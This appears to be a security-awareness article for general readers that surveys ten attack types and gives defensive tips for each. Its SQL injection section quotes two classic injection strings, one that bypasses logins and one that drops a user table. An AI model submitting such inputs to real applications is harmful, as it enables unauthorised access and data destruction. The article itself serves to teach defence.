1. Phishing Attacks

Phishing remains the most common and successful cyber attack vector, responsible for over 90% of data breaches according to Verizon's annual Data Breach Investigations Report. It works by impersonating a trusted entity — your bank, your employer, a popular service — to trick you into revealing sensitive information or clicking malicious links.

How it works: An attacker crafts an email, text message (smishing), or voice call (vishing) that appears to come from a legitimate source. The message typically creates urgency: "Your account has been compromised," "Payment failed," or "Verify your identity within 24 hours." The link leads to a fake login page that captures your credentials, or the attachment contains malware.

Modern phishing is sophisticated. Attackers use AI to generate grammatically perfect emails, clone legitimate websites pixel by pixel, and even spoof sender addresses so the email appears to come from a trusted contact. Spear phishing targets specific individuals using personal information gathered from social media and public records.

How to defend yourself:

• Hover over links before clicking to verify the URL
• Never enter credentials after clicking an email link — navigate to the site directly
• Be suspicious of urgency, threats, or too-good-to-be-true offers
• Use email filters and report phishing attempts
• Enable 2FA so stolen credentials alone aren't enough

2. Ransomware

Ransomware encrypts your files and demands payment — typically in cryptocurrency — for the decryption key. It's one of the most financially devastating attacks, with average ransom demands exceeding $250,000 for businesses and damages including downtime, data loss, and recovery costs far exceeding the ransom itself.

How it works: Ransomware typically arrives through phishing emails, compromised websites, or exploited vulnerabilities in unpatched software. Once executed, it rapidly encrypts files on the local system and any accessible network drives. The victim sees a ransom note demanding payment, usually with a deadline after which the ransom increases or the decryption key is destroyed.

Notable examples: The WannaCry attack (2017) infected over 200,000 computers across 150 countries in a single day, exploiting a Windows vulnerability. The Colonial Pipeline attack (2021) shut down the largest fuel pipeline in the United States, causing gas shortages across the East Coast. The MOVEit breach (2023) affected over 2,000 organizations through a supply chain vulnerability.

How to defend yourself:

• Maintain regular, offline backups (the 3-2-1 rule)
• Keep all software and operating systems updated
• Use email filtering to block malicious attachments
• Don't enable macros in documents from unknown sources
• Consider endpoint detection and response (EDR) software for businesses

3. Credential Stuffing

Credential stuffing is an automated attack that tests stolen username/password pairs across multiple websites, exploiting the widespread habit of password reuse. It's the reason why a breach at one service can compromise your accounts on completely unrelated platforms.

How it works: Attackers obtain databases of stolen credentials from data breaches — billions are available on the dark web. They load these into automated tools that attempt logins across hundreds of popular services (banks, email providers, e-commerce sites, streaming services). With password reuse rates estimated at 50–65%, even a small hit rate yields thousands of compromised accounts.

Scale of the problem: Akamai's research shows that credential stuffing attacks account for over 34 billion login attempts per year across their network. The attacks use residential proxy networks to evade rate limiting and IP blocking, making each attempt appear to come from a different legitimate user.

How to defend yourself:

• Use unique passwords for every account (password manager essential)
• Enable 2FA on all important accounts
• Monitor breach notification services like Have I Been Pwned
• Response: if notified of a breach, change that password immediately and anywhere else you may have reused it

4. Man-in-the-Middle Attacks

In a man-in-the-middle (MitM) attack, an attacker secretly intercepts and potentially alters communications between two parties who believe they're communicating directly. This can happen on unsecured Wi-Fi networks, through DNS hijacking, or via compromised routers.

How it works: The attacker positions themselves between you and the server you're communicating with. In a classic scenario, you connect to a public Wi-Fi network at a coffee shop. The attacker is running that network (or has compromised it) and can see all unencrypted traffic — login credentials, emails, messages. More sophisticated MitM attacks can intercept HTTPS connections through SSL stripping or rogue certificates.

Common MitM techniques:

• Evil twin attacks: Setting up a fake Wi-Fi access point with a familiar name ("Starbucks_WiFi_Free")
• ARP spoofing: Tricking devices on a local network into sending traffic through the attacker's machine
• SSL stripping: Downgrading HTTPS connections to HTTP, removing encryption
• DNS spoofing: Redirecting domain lookups to attacker-controlled servers

How to defend yourself:

• Use a VPN on public Wi-Fi networks
• Verify HTTPS in the address bar before entering sensitive information
• Avoid transmitting sensitive data on public Wi-Fi whenever possible
• Use services that implement HSTS (HTTP Strict Transport Security)
• Keep your devices' certificate stores updated

5. SQL Injection

SQL injection (SQLi) is a web application attack where an attacker inserts malicious SQL code into input fields to manipulate the application's database. It's been one of the top web vulnerabilities for over two decades and remains in the OWASP Top 10.

How it works: Many websites store user data in SQL databases and construct database queries using user input. If the application doesn't properly sanitize input, an attacker can inject SQL commands. For example, entering ' OR '1'='1 into a login form might bypass authentication entirely, or entering '; DROP TABLE users;-- could delete the entire user database.

Impact: Successful SQL injection can allow attackers to read the entire database (including user credentials, personal data, and credit card numbers), modify or delete data, execute administrative operations, and in some cases, gain access to the underlying operating system.

How to defend yourself (as a user):

• You can't directly prevent SQLi — it's a server-side vulnerability
• Choose services that demonstrate good security practices
• Use unique passwords so a SQLi breach at one site doesn't cascade
• Monitor your accounts for unauthorized activity
• For developers: use parameterized queries, input validation, and prepared statements

6. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) attacks inject malicious scripts into web pages viewed by other users. When the victim's browser renders the page, the script executes as if it were legitimate site code, potentially stealing session tokens, cookies, or other sensitive data.

How it works: An attacker finds a way to inject JavaScript into a web application — through comment fields, search boxes, URL parameters, or other user inputs. When another user views the page containing the injected script, their browser executes it. The script can steal the user's session cookie (allowing the attacker to impersonate them), redirect them to phishing sites, or capture their keystrokes.

Types of XSS:

• Stored XSS: The malicious script is permanently stored on the target server (in a database, forum post, or comment)
• Reflected XSS: The script is reflected off a web application in search results, error messages, or URL parameters
• DOM-based XSS: The vulnerability exists in client-side code rather than server-side

How to defend yourself:

• Keep your browser updated — modern browsers include XSS protections
• Use browser extensions like NoScript or uBlock Origin
• Be cautious of suspicious links, especially those with unusual URL parameters
• Log out of sensitive services when not in use (limits session theft impact)

7. DoS and DDoS Attacks

Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks overwhelm a target system with traffic, making it unavailable to legitimate users. While these primarily target businesses and infrastructure, they can affect anyone who depends on the targeted service.

How it works: A DoS attack floods a server with requests from a single source. A DDoS attack amplifies this by using thousands or millions of compromised devices (a botnet) to generate traffic simultaneously. The target server can't distinguish legitimate requests from attack traffic and becomes overwhelmed — slow, unresponsive, or completely offline.

Scale: Modern DDoS attacks routinely exceed 1 terabit per second of traffic. The largest recorded attacks have surpassed 3 Tbps. Even major cloud providers and CDNs can be challenged by attacks at this scale.

Real-world impact: DDoS attacks have disrupted banking services, taken gaming networks offline, affected healthcare systems, and been used as smokescreens for other attacks. Some attackers demand ransom to stop the attack, combining DDoS with extortion.

How to defend yourself:

• Individual users typically aren't direct DDoS targets
• Businesses should use DDoS mitigation services (Cloudflare, AWS Shield, Akamai)
• Ensure IoT devices on your network are secured — compromised IoT devices are commonly recruited into botnets
• Diversify services so a DDoS attack on one provider doesn't take down everything you depend on

8. Malware and Trojans

Malware is a broad category encompassing any software designed to harm, exploit, or otherwise compromise a computer system. Trojans specifically disguise themselves as legitimate software to trick users into installing them.

Common malware types:

• Trojans: Disguised as legitimate software — a free game, a cracked application, a fake antivirus tool. Once installed, they create backdoors, steal data, or download additional malware.
• Spyware: Silently monitors your activities — keystrokes, browsing history, passwords, screenshots — and sends the data to the attacker.
• Adware: Displays unwanted advertisements and may redirect your searches. Less dangerous than other malware but often bundled with spyware.
• Worms: Self-replicating malware that spreads across networks without user interaction. A single infected device can compromise an entire network.
• Rootkits: Deeply embedded malware that hides itself from the operating system and antivirus software. Extremely difficult to detect and remove.

How malware spreads: Email attachments, malicious downloads, compromised websites, infected USB drives, software vulnerabilities, and malicious ads (malvertising).

How to defend yourself:

• Only download software from official sources and app stores
• Keep your operating system and antivirus software updated
• Don't open email attachments from unknown senders
• Use an ad blocker to prevent malvertising
• Be skeptical of "free" versions of paid software — they're often trojan-laden
• Regularly scan your devices with updated security software

9. Social Engineering

Social engineering attacks manipulate people rather than technology. They exploit human psychology — trust, fear, urgency, curiosity, helpfulness — to trick victims into compromising their own security.

Common social engineering techniques:

• Pretexting: The attacker creates a fabricated scenario to gain trust. "Hi, I'm from IT support. We detected unusual activity on your account. I need to verify your credentials to fix it."
• Baiting: Leaving infected USB drives or devices in public places, relying on curiosity. A USB drive labeled "Salary Information Q4" found in a parking lot is almost guaranteed to be plugged in by someone.
• Quid pro quo: Offering something in exchange for information. "I'll give you free antivirus software if you disable your firewall for the installation."
• Tailgating/Piggybacking: Following authorized personnel through secured doors. "Hold the door for me? My badge isn't working."
• Watering hole attacks: Compromising websites that a specific group frequently visits, infecting visitors automatically.

Why it works: Humans are wired for social cooperation. We want to be helpful, we respect authority, and we respond to urgency. Skilled social engineers exploit these instincts in ways that bypass rational thought.

How to defend yourself:

• Verify identity before sharing any information, especially unexpected requests
• Be suspicious of urgency — legitimate organizations don't pressure you
• Establish verification procedures (call back using official numbers, not numbers provided by the caller)
• In organizations, conduct regular social engineering awareness training
• Trust but verify: even if someone seems trustworthy, confirm unusual requests through independent channels

10. Zero-Day Exploits

A zero-day exploit targets a software vulnerability that the vendor doesn't yet know about — meaning there's zero days of protection available. These are among the most dangerous attacks because no patch exists at the time of exploitation.

How it works: A researcher (or attacker) discovers a vulnerability in widely used software. Instead of reporting it to the vendor (responsible disclosure), an attacker develops an exploit. Because no patch is available, every user of that software is vulnerable. Zero-day exploits are extremely valuable on the black market — a zero-day for iOS or Windows can sell for $1 million or more.

Recent examples: The Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j library affected millions of systems worldwide. The MOVEit zero-day (2023) was exploited by the Cl0p ransomware group to steal data from thousands of organizations before a patch was available.

How to defend yourself:

• Keep all software updated — once a patch is released, apply it immediately
• Use software with a strong security track record and active development
• Employ defense-in-depth strategies — don't rely on a single layer of security
• Use endpoint protection that includes behavioral detection (not just signature-based)
• Minimize your attack surface by uninstalling software you don't use
• For businesses: implement network segmentation and zero-trust architecture to limit the impact of any single compromise

---

Understanding these ten attack types gives you a framework for thinking about cybersecurity threats. You don't need to become a security expert, but knowing what you're up against helps you make informed decisions about protecting your digital life. Start with the fundamentals — strong passwords, 2FA, updates, and healthy skepticism — and you'll be well-defended against the vast majority of attacks.